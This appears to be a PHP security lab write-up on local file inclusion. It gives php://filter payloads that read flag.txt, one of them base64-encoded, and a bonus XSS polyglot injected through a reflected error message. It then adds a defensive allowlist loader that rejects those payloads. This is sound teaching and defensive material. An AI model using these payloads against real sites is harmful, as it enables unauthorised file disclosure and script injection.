PHP

Local file inclusion to arbitrary file read with PHP wrappers


Local File Inclusion With PHP Wrappers

Perform a Local File Inclusion by taking advantage of PHP's built-in wrappers. You can still use the standard method to read the file, but for educational purposes it is good to know that PHP supports wrappers that can be used to bypass filters and/or web application firewalls (WAFs).

Hints

Hint #1

Try using php://filter

Solution

Read the solution

Payload:

Without base64: the output will also contain PHP errors, but it still exposes the file content.

php://filter/resource=flag.txt

Base64 output:

php://filter/convert.base64-encode/resource=flag.txt

Bonus

You can also create a polyglot payload by injecting an XSS payload into the reflected PHP error as an invalid filter name. (Click on the "eye" icon in the top right corner of the "RESULT" tab to render HTML and to see the XSS pop.)

php://filter/<script>alert(1)<%2fscript>/resource=flag.txt
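
For the defensive side of this lab, here is an added example (not the lab's own code) of a loader that rejects all three payloads above. The directory, the page names and the functions `resolve_page` and `render_page` are hypothetical, and the code assumes PHP 8 for `str_starts_with`.

```php
<?php
declare(strict_types=1);

// Hypothetical page directory and allowlist (assumptions, not from the lab).
define('PAGE_DIR', sys_get_temp_dir() . '/lfi_demo_pages');
const ALLOWED_PAGES = ['home.txt', 'about.txt'];

// Constructed sample file so the example runs offline.
if (!is_dir(PAGE_DIR)) { mkdir(PAGE_DIR, 0700, true); }
file_put_contents(PAGE_DIR . '/home.txt', 'Welcome <b>home</b>');

/** Return the real path of an allowed page, or null if the request is rejected. */
function resolve_page(string $name): ?string
{
    // Early, explicit reject of any stream-wrapper scheme (php://, file://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $name) === 1) {
        return null;
    }
    // The real control: exact match against known file names, so no
    // directories, traversal sequences or wrapper syntax can get through.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    // Canonicalise and confirm the file still sits inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

/** Read (never include) the page and escape it before it reaches the browser. */
function render_page(string $name): string
{
    $path = resolve_page($name);
    if ($path === null) {
        return 'Page not found.'; // the rejected input is never echoed back
    }
    return htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: the page's three payloads (URL-decoded) and one valid name.
foreach (['php://filter/resource=flag.txt',
          'php://filter/convert.base64-encode/resource=flag.txt',
          'php://filter/<script>alert(1)</script>/resource=flag.txt',
          'home.txt'] as $s) {
    printf("%-58s => %s\n", $s, resolve_page($s) === null ? 'rejected' : 'allowed');
}
```

Because rejected input is never passed to a file function, PHP raises no warning containing the attacker-supplied filter name, which removes the reflected-error XSS from the bonus; disabling `display_errors` in production closes the same channel for errors raised elsewhere.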